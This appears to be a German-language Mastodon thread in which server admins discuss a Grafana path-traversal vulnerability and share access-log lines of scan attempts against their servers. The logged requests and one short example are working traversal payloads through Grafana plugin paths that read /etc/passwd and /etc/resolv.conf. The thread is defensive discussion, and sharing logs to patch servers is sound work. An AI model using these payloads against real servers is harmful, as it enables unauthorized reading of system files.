@kunsi PSA in this Case: Public Security Announcement? 🤔

@kunsi Weißt du genaueres wie der funktioniert? Wird da mit dem URL Encoding rum gespielt?

@clerie nö, einfach /irgrndwas/mit/plugins/../../../../etc/passwd :/

Exzellente Idee asap zu aktualisieren.
Mein Access Log so:

2400:8902:: - - [07/Dec/2021:12:44:22 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 150 "-" "-" "0.258" "-" "-"

Ich hätte auch noch die resolv.conf im Angebot. Fragt sich nur was Menschen damit möchten.

@stillbeben jo hier auch, gut das in der Datei eh nix relevantes steht. Aber der nginx vorne dran scheint es weg geblockt zu haben.

@leah @stillbeben Ja, merge_slashes macht da wohl automagie, und das ist default an.

@kunsi @stillbeben nicht ganz sicher, gab auch anfragen an die resolve.conf die mit 200er beantwortet wurden.

@kunsi @stillbeben 58.187.174.69 - - [07/Dec/2021:16:49:46 +0100] "GET /public/plugins/geomap/../../#../../../../../../../../etc/resolv.conf HTTP/1.1" 200 46 "-" "-"

@kunsi @stillbeben alles Richtung /etc/passwd gab aber nur nen 400er

@kunsi @stillbeben spannend ist auch, ich sehe hier ein paar Requests vor der offiziellen Veröffentlichung.

190.2.132.148 - - [06/Dec/2021:20:12:31 +0100] "GET /grafana/public/plugins/mysql/.//..//.//..//.//..//.//..//.//..//VERSION HTTP/1.1" 400 150 "-" "-"

@leah @kunsi Spannend. Dann hatte wohl jemand bereits vorher Spaß. Zeigt mal wieder, dass man sich nie sicher fühlen sollte.

@leah @stillbeben Ja, irgendwer hat ein POC gedroppt, und deswegen haben sie es ne Woche früher als geplant veröffentlicht.

@leah @stillbeben Steht in deren Blogpost bei der Release Timeline

Sign in to participate in the conversation
chaos.social

chaos.social – a Fediverse instance for & by the Chaos community